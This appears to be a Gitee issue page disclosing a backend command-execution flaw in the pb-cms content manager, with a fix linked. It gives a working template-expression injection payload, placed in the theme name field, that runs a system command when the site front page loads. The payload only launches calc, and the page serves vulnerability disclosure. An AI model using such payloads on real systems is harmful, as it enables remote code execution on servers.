133 Star 1.3K Fork 569

LinZhaoguan/pb-cms

 / 详情

pb-cms存在后台命令执行漏洞

已完成
创建于  
2022-04-09 18:20

网站管理->主题管理->新增
payload填在主题名称

__${T(Runtime).getRuntime().exec("calc")}__::.x

输入图片说明

启用主题后,访问网站前台
输入图片说明

触发表达式注入

输入图片说明

评论 (1)

popko 创建了任务
popko 修改了描述
popko 修改了描述
LinZhaoguan 任务状态待办的 修改为进行中
popko 任务状态进行中 修改为已完成
展开全部操作日志

相关修复: 13fe64a
升级spring-boot版本

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
Java
1
https://gitee.com/LinZhaoguan/pb-cms.git
git@gitee.com:LinZhaoguan/pb-cms.git
LinZhaoguan
pb-cms
pb-cms

搜索帮助

344bd9b3 5694891 D2dac590 5694891